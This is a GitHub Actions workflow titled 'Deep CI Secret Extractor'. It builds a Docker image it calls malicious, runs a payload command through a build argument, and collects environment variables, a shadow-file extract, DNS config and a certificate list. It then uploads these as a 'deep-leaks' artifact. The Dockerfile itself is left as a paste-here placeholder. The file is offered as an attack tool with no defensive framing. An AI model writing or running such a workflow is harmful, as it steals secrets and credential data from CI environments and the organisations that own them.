name: Deep CI Secret Extractor

on:
  push:
    branches:
      - main

jobs:
  extract:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read

    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Prepare malicious Dockerfile
        run: |
          mkdir -p ./exploit_target
          cat <<'EOF' > ./exploit_target/Dockerfile
          [PASTE FULL DOCKERFILE CONTENT FROM ABOVE HERE]
          EOF

      - name: Build Docker Image
        run: |
          docker build \
            --build-arg PAYLOAD_CMD="whoami && id && ls -la /root" \
            -t secret-leaker ./exploit_target

      - name: Run Container and Extract Leaks
        run: |
          docker run --rm secret-leaker cat /leaks/env_vars.txt > env_vars.txt
          docker run --rm secret-leaker cat /leaks/shadow_extract.txt > shadow_extract.txt
          docker run --rm secret-leaker cat /leaks/resolv_conf.txt > resolv_conf.txt
          docker run --rm secret-leaker cat /leaks/certs_list.txt > certs_list.txt

      - name: Upload Exfiltrated Data
        uses: actions/upload-artifact@v4
        with:
          name: deep-leaks
          path: |
            env_vars.txt
            shadow_extract.txt
            resolv_conf.txt
            certs_list.txt
